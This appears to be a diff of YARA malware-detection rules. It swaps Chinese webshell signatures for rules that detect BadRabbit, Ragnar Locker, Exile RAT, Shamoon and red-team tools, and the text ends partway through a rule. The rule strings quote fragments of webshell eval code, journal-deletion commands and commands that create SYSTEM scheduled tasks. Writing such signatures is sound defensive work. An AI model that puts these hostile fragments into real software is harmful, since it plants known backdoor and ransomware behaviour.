+		author = "John Lambert @JohnLaTwC"
+		id = "0235795b-6d0b-5bba-8ae6-606c3b613c86"
+		date = "2018-04-03"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L257-L273"
+		reference = "https://github.com/trustedsec/unicorn/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_unicorn_obfuscated_powershell.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "15636f0e7dc062437608c1f22b1d39fa15ab2136"
-		logic_hash = "623e235ff3eb0922fe8aee732144a15bcc0c580229654ae988353176f488b085"
+		hash = "b93d2fe6a671a6a967f31d5b3a0a16d4f93abcaf25188a2bbdc0894087adb10d"
+		logic_hash = "cb0044d5ee146213c96161d52880ce6c20d5884d57620c73f359673d4ae4b76b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash2 = "1afb9795cb489abce39f685a420147a2875303a07c32bf7eec398125300a460b"
 
 	strings:
-		$s1 = "$sURL = \"301:http://\".$sServer.\"/index.asp\";" fullword ascii
-		$s2 = "(gov)\\\\.(cn)$/i\", $aURL[\"host\"])" ascii
-		$s3 = "$aArg = explode(\" \", $sContent, 5);" fullword ascii
-		$s4 = "$sURL = $aArg[0];" fullword ascii
+		$h1 = "powershell"
+		$sa1 = ".value.toString() 'JAB"
+		$sa2 = ".value.toString() ('JAB"
+		$sb1 = "-w 1 -C \"s"
+		$sb2 = "/w 1 /C \"s"
 
 	condition:
-		filesize < 3KB and 3 of them
+		filesize < 20KB and uint32be( 0 ) == 0x706f7765 and $h1 at 0 and ( uint16be( filesize -2 ) == 0x2722 or ( uint16be( filesize -2 ) == 0x220a and uint8( filesize -3 ) == 0x27 ) or ( uint16be( filesize -2 ) == 0x2922 and uint8( filesize -3 ) == 0x27 ) ) and ( 1 of ( $sa* ) and 1 of ( $sb* ) )
 }
-rule SIGNATURE_BASE_CN_Tools_Item : FILE
+
+rule SIGNATURE_BASE_MAL_Exilerat_Feb19_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file item.php"
+		description = "Detects Exile RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "954f24c9-d7d5-56d3-86f0-0cf8832640dd"
-		date = "2015-06-13"
+		id = "f0a510f3-5fea-59a7-8991-9d06dc478b2a"
+		date = "2019-02-04"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L275-L291"
+		reference = "https://creativecommons.org/licenses/by-nc/4.0/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_exile_rat.yar#L4-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a584db17ad93f88e56fd14090fae388558be08e4"
-		logic_hash = "1e927fd093aa11ad525f3f64d657f314520669b4237eac8f87d0be53cd848044"
+		logic_hash = "0556bc0dbd33502d5bf823cf265a4e133d9af43076abe35a86cf5e20ab314e35"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3eb026d8b778716231a07b3dbbdc99e2d3a635b1956de8a1e6efc659330e52de"
 
 	strings:
-		$s1 = "$sURL = \"http://\".$sServer.\"/\".$sWget;" fullword ascii
-		$s2 = "$sURL = \"301:http://\".$sServer.\"/\".$sWget;" fullword ascii
-		$s3 = "$sWget=\"index.asp\";" fullword ascii
-		$s4 = "$aURL += array(\"scheme\" => \"\", \"host\" => \"\", \"path\" => \"\");" fullword ascii
+		$x1 = "Content-Disposition:form-data;name=\"x.bin\"" fullword ascii
+		$s1 = "syshost.dll" fullword ascii
+		$s2 = "\\scout\\Release\\scout.pdb" ascii
+		$s3 = "C:\\data.ini" fullword ascii
+		$s4 = "my-ip\" value=\"" fullword ascii
+		$s5 = "ver:%d.%d.%d" fullword ascii
 
 	condition:
-		filesize < 4KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "da8475fc7c3c90c0604ce6a0b56b5f21" or 3 of them )
 }
-rule SIGNATURE_BASE_F3_Diy : FILE
+rule SIGNATURE_BASE_Badrabbit_Gen : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file diy.asp"
+		description = "Detects BadRabbit Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f36c6dd-89e8-511b-a499-131f1e8a420a"
-		date = "2015-06-13"
+		id = "272e50f8-5aef-52ec-a5d0-01e8504d6c55"
+		date = "2017-10-25"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L293-L307"
+		reference = "https://pastebin.com/Y7pJv3tK"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_badrabbit.yar#L11-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f39c2f64abe5e86d8d36dbb7b1921c7eab63bec9"
-		logic_hash = "37d6bc61d790ff30c98ded08ff875431fda525cd3ac10b4b1ba3f8f42167ed8c"
+		logic_hash = "21c63a02d0284ce759b087f4869c4ed8e6b50c37ffeb724538567e28aeae16ac"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
+		hash2 = "579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648"
+		hash3 = "630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da"
 
 	strings:
-		$s0 = "<%@LANGUAGE=\"VBScript.Encode\" CODEPAGE=\"936\"%>" fullword ascii
-		$s5 = ".black {" fullword ascii
+		$x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST" fullword wide
+		$x2 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\"" fullword wide
+		$x3 = "C:\\Windows\\infpub.dat" fullword wide
+		$x4 = "C:\\Windows\\cscc.dat" fullword wide
+		$s1 = "need to do is submit the payment and get the decryption password." fullword ascii
+		$s2 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
+		$s3 = "\\\\.\\pipe\\%ws" fullword wide
+		$s4 = "fsutil usn deletejournal /D %c:" fullword wide
+		$s5 = "Run DECRYPT app at your desktop after system boot" fullword ascii
+		$s6 = "Files decryption completed" fullword wide
+		$s7 = "Disable your anti-virus and anti-malware programs" fullword wide
+		$s8 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
+		$s9 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$s10 = "%ws C:\\Windows\\%ws,#1 %ws" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Chinachopper_Temp : FILE
+rule SIGNATURE_BASE_Badrabbit_Mimikatz_Comp : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file temp.asp"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f163787f-fcc9-568a-a12d-4057cb4f0d29"
-		date = "2015-06-13"
+		id = "52affd3f-6bf9-55f6-92a5-69314a2e76e0"
+		date = "2017-10-25"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L309-L325"
+		reference = "https://pastebin.com/Y7pJv3tK"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_badrabbit.yar#L42-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b0561ea52331c794977d69704345717b4eb0a2a7"
-		logic_hash = "3669dfa10867970456f6638035a87d448e2b728387fbd07b59ffd981a1ab6200"
+		logic_hash = "9d12d9331686a54e8d32f94761e4889710bbd2432d4cb2e4e7e3f21ef6aa082a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035"
 
 	strings:
-		$s0 = "o.run \"ff\",Server,Response,Request,Application,Session,Error" fullword ascii
-		$s1 = "Set o = Server.CreateObject(\"ScriptControl\")" fullword ascii
-		$s2 = "o.language = \"vbscript\"" fullword ascii
-		$s3 = "o.addcode(Request(\"SC\"))" fullword ascii
+		$s1 = "%lS%lS%lS:%lS" fullword wide
+		$s2 = "lsasrv" fullword wide
+		$s3 = "CredentialKeys" ascii
+		$s4 = { 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00 }
 
 	condition:
-		filesize < 1KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them )
 }
-rule SIGNATURE_BASE_Tools_2015 : FILE
+
+rule SIGNATURE_BASE_APT_ME_Bigbang_Gen_Jul18_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file 2015.jsp"
+		description = "Detects malware from Big Bang campaign against Palestinian authorities"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb2826ab-ef8d-5a93-9ede-f5bbd7ab4ff4"
-		date = "2015-06-13"
+		id = "f1097998-9414-511c-b177-ff09154964a8"
+		date = "2018-07-09"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L327-L344"
+		reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bigbang.yar#L3-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8fc67359567b78cadf5d5c91a623de1c1d2ab689"
-		logic_hash = "2b93ef42c277fd8415cf89bf1bef3e841c56a2b4aa1507d99b84cd8adc9a0644"
+		logic_hash = "496994ee035aa09233c648cf4ec0d1e84ceb970917b4dc5208a1390ec6eb39c2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4db68522600f2d8aabd255e2da999a9d9c9f1f18491cfce9dadf2296269a172b"
+		hash2 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
+		hash3 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
 
 	strings:
-		$s0 = "Configbis = new BufferedInputStream(httpUrl.getInputStream());" fullword ascii
-		$s4 = "System.out.println(Oute.toString());" fullword ascii
-		$s5 = "String ConfigFile = Outpath + \"/\" + request.getParameter(\"ConFile\");" fullword ascii
-		$s8 = "HttpURLConnection httpUrl = null;" fullword ascii
-		$s19 = "Configbos = new BufferedOutputStream(new FileOutputStream(Outf));;" fullword ascii
+		$x2 = "%@W@%S@c@ri%@p@%t.S@%he@%l%@l" ascii
+		$x3 = "S%@h%@e%l%@l." ascii
+		$x4 = "(\"S@%t@%a%@rt%@up\")" ascii
+		$x5 = "aW5zdGFsbCBwcm9nOiBwcm9nIHdpbGwgZGVsZXRlIG9sZCB0bXAgZmlsZQ==" fullword ascii
+		$x6 = "aW5zdGFsbCBwcm9nOiBUaGVyZSBpcyBubyBvbGQgZmlsZSBpbiB0ZW1wLg==" fullword ascii
+		$x7 = "VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu" fullword ascii
+		$x8 = "aW5zdGFsbCBwcm9nOiBDcmVhdGUgVGFzayBhZnRlciA1IG1pbiB0byBydW4gRmlsZSBmcm9tIHRtcA==" fullword ascii
+		$x9 = "UnVuIEZpbGU6IE15IHByb2cgaXMgRXhpdC4=" fullword ascii
+		$x10 = "li%@%@nk.W%@%@indo@%%@%@%wS%@%@tyle = 3" fullword ascii
 
 	condition:
-		filesize < 7KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of them or pe.imphash ( ) == "0f09ea2a68d04f331df9a5d0f8641332" )
 }
-rule SIGNATURE_BASE_Chinachopper_Temp_2 : FILE
+rule SIGNATURE_BASE_APT_ME_Bigbang_Mal_Jul18_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file temp.php"
+		description = "Detects malware from Big Bang report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3952ed2b-fb27-5c45-9cd7-b7a300b37c0e"
-		date = "2015-06-13"
+		id = "f30b2e11-f90a-5068-8eaa-25f11218ec6c"
+		date = "2018-07-09"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L346-L359"
+		reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bigbang.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "604a4c07161ce1cd54aed5566e5720161b59deee"
-		logic_hash = "1b6d840797afcdbf7c72836557dbd486780c760471e79133810346c301cca80b"
+		logic_hash = "da45482b465549fce0f088c5818dff4a734faa2e4fbcec43b750893d1c3fefad"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
+		hash2 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
 
 	strings:
-		$s0 = "@eval($_POST[strtoupper(md5(gmdate(" ascii
+		$s1 = "%Y%m%d-%I-%M-%S" fullword ascii
+		$s2 = "/api/serv/requests/%s/runfile/delete" fullword ascii
+		$s3 = "\\part.txt" ascii
+		$s4 = "\\ALL.txt" ascii
+		$s5 = "\\sat.txt" ascii
+		$s6 = "runfile.proccess_name" fullword ascii
+		$s7 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii
 
 	condition:
-		filesize < 150 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them
 }
-rule SIGNATURE_BASE_Templatr : FILE
+rule SIGNATURE_BASE_Crowdstrike_Shamoon_Droppedfile
 {
 	meta:
-		description = "Chinese Hacktool Set - file templatr.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b361a49d-1e05-5597-bf8b-735e04397ffa"
-		date = "2015-06-13"
+		description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
+		author = "Florian Roth"
+		id = "b350f1b1-db73-574b-957b-34e5a84f68b0"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L361-L374"
+		reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shamoon.yar#L1-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "759df470103d36a12c7d8cf4883b0c58fe98156b"
-		logic_hash = "80d207ee47c0c602ddd281e0e187b83cdb4f1385f4b46ad2a4f5630b8f9e96a1"
+		logic_hash = "ed550832b217f7edceea2edf7c4453925ed1759d97db7728f7face6ff10ee361"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "eval(gzinflate(base64_decode('" ascii
+		$testn123 = "test123" wide
+		$testn456 = "test456" wide
+		$testn789 = "test789" wide
+		$testdomain = "testdomain.com" wide
+		$pingcmd = "ping -n 30 127.0.0.1 >nul" wide
 
 	condition:
-		filesize < 70KB and all of them
+		( any of ( $testn* ) or $pingcmd ) and $testdomain
 }
-rule SIGNATURE_BASE_Reduhservers_Reduh_3 : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Ragna_Locker_Apr20_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file reDuh.aspx"
+		description = "Detects Ragna Locker Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "69f5fd6b-a9b3-500b-8723-d1c82494903d"
-		date = "2015-06-13"
+		id = "67164cb4-73b7-5c4e-88f9-42379b88c641"
+		date = "2020-04-27"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L376-L392"
+		reference = "https://otx.alienvault.com/indicator/file/c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_ragna_locker.yar#L3-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0744f64c24bf4c0bef54651f7c88a63e452b3b2d"
-		logic_hash = "5a3bc023e0e8a5ccc8ee8e1b5e7ee0fca64e3f92b72d0aad15b25c82a23da487"
+		logic_hash = "05a18818f22c836c3e1f1fa9682d787bbe86e6d3bb026a80a7d4c33ad95c2cd3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c2bd70495630ed8279de0713a010e5e55f3da29323b59ef71401b12942ba52f6"
 
 	strings:
-		$s1 = "Response.Write(\"[Error]Unable to connect to reDuh.jsp main process on port \" +" ascii
-		$s2 = "host = System.Net.Dns.Resolve(\"127.0.0.1\");" fullword ascii
-		$s3 = "rw.WriteLine(\"[newData]\" + targetHost + \":\" + targetPort + \":\" + socketNum" ascii
-		$s4 = "Response.Write(\"Error: Bad port or host or socketnumber for creating new socket" ascii
+		$x1 = "---RAGNAR SECRET---" ascii
+		$xc1 = { 0D 0A 25 73 0D 0A 0D 0A 25 73 0D 0A 25 73 0D 0A
+               25 73 0D 0A 0D 0A 25 73 0D 0A 00 00 2E 00 72 00
+               61 00 67 00 6E 00 61 00 72 00 5F }
+		$xc2 = { 00 2D 00 66 00 6F 00 72 00 63 00 65 00 00 00 00
+               00 57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C
+               00 44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00
+               00 5C 00 6E 00 6F 00 74 00 65 00 70 00 61 00 64
+               00 2E 00 65 00 78 00 65 00 }
+		$s1 = "bootfont.bin" wide fullword
+		$sc2 = { 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 00
+               00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 2E
+               00 6F 00 6C 00 64 00 00 00 54 00 6F 00 72 00 20
+               00 62 00 72 00 6F 00 77 00 73 00 65 00 72 00 }
+		$op1 = { c7 85 58 ff ff ff 55 00 6b 00 c7 85 5c ff ff ff }
+		$op2 = { 50 c7 85 7a ff ff ff 5c }
+		$op3 = { 8b 75 08 8a 84 0d 20 ff ff ff ff 45 08 32 06 8b }
 
 	condition:
-		filesize < 40KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_Chinachopper_Temp_3 : FILE
+
+rule SIGNATURE_BASE_MAL_Ransom_Ragnarlocker_July_2020_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file temp.aspx"
-		author = "Florian Roth (Nextron Systems)"
-		id = "573e7da6-f58f-5814-b3e8-a0db3ecfe558"
-		date = "2015-06-13"
+		description = "Detects Ragnarlocker by strings (July 2020)"
+		author = "Arkbird_SOLG"
+		id = "60e09057-d9f8-5e89-8f47-c5dda32806c6"
+		date = "2020-07-30"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L394-L408"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_ragna_locker.yar#L38-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c5ecb8bc1d7f0e716b06107b5bd275008acaf7b7"
-		logic_hash = "6a0d7817607362f325957e30cace24d32635b7e0411e161588ee573118f91b6a"
+		logic_hash = "dc44da2f9023e0702afa8081e85ba817ebfde15f449261fae9de729d51262b04"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87"
 
 	strings:
-		$s0 = "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"" ascii
-		$s1 = "\"],\"unsafe\");%>" ascii
+		$f1 = "bootfont.bin" fullword wide
+		$f2 = "bootmgr.efi" fullword wide
+		$f3 = "bootsect.bak" fullword wide
+		$r1 = "$!.txt" fullword wide
+		$r2 = "---BEGIN KEY R_R---" fullword ascii
+		$r3 = "!$R4GN4R_" wide
+		$r4 = "RAGNRPW" fullword ascii
+		$r5 = "---END KEY R_R---" fullword ascii
+		$a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii
+		$a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
+		$a3 = "WinSta0\\Default" fullword wide
+		$a4 = "%s-%s-%s-%s-%s" fullword wide
+		$a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide
+		$c1 = "-backup" fullword wide
+		$c2 = "-force" fullword wide
+		$c3 = "-vmback" fullword wide
+		$c4 = "-list" fullword wide
+		$s1 = ".ragn@r_" wide
+		$s2 = "\\notepad.exe" wide
+		$s3 = "Opera Software" fullword wide
+		$s4 = "Tor browser" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 150 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "2c2aab89a4cba444cf2729e2ed61ed4f" and ( ( 2 of ( $f* ) ) and ( 3 of ( $r* ) ) and ( 4 of ( $a* ) ) and ( 2 of ( $c* ) ) and ( 2 of ( $s* ) ) ) )
 }
-rule SIGNATURE_BASE_Shell_Asp : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Fakefilemaker : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set Webshells - file Asp.html"
-		author = "Florian Roth (Nextron Systems)"
-		id = "52089205-8f36-5a0b-a1ae-67c91a253ad2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L410-L425"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "2c87114f-5295-583f-b567-623d478ce0eb"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/FakeFileMaker"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L3-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5e0bc914ac287aa1418f6554ddbe0ce25f2b5f20"
-		logic_hash = "47c5c242713446471d5da4d9245b99561c26ad7fa016059076a6f0acab542c3c"
+		logic_hash = "27d402835f31b6383c837e90248ae5c6d22f4c267d52625ebfbcc2ee5099ccad"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
-		$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
-		$s3 = "function Command(cmd, str){" fullword ascii
+		$name = "FakeFileMaker" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Aspxtag : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Wmipersistence : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file aspxtag.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L428-L443"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "7a674596-c697-569d-a16c-3cefe4ff752a"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/mdsecactivebreach/WMIPersistence"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L18-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "42cb272c02dbd49856816d903833d423d3759948"
-		logic_hash = "6ffeee18945cab96673e4b9efc143017d168be12b794fa26aa4a304f15ae8e13"
+		logic_hash = "f8f5e1b6d9b9e8e2f76a7e02385142bbeb755d1b1e41e501f4f74fcaba0a7dad"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "String wGetUrl=Request.QueryString[" fullword ascii
-		$s2 = "sw.Write(wget);" fullword ascii
-		$s3 = "Response.Write(\"Hi,Man 2015\"); " fullword ascii
+		$name = "WMIPersistence" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 2KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Txt_Php : FILE
+rule SIGNATURE_BASE_HKTL_NET_Adcollector_Sep22_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - Webshells - file php.txt"
+		description = "Detects ADCollector Tool - a lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65d5c46f-006d-58f9-bb7f-0a2e1f1853bd"
-		date = "2015-06-14"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L445-L461"
+		id = "48b376e4-752b-523e-b34e-65b6944c33fb"
+		date = "2022-09-15"
+		modified = "2024-12-10"
+		reference = "https://github.com/dev-2null/ADCollector"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L55-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "eaa1af4b898f44fc954b485d33ce1d92790858d0"
-		logic_hash = "ace26e7c0dca285febf6b9192cbe59cc7e55e80f2f4e1a99aba25afcbeadeec1"
+		logic_hash = "66d5363e885378c442e7532f69d4c36618d7a0f5dbe67490631d1ed5078d3fba"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338"
+		hash2 = "cc086eb7316e68661e3d547b414890d5029c5cc460134d8b628f4b0be7f27fb3"
 
 	strings:
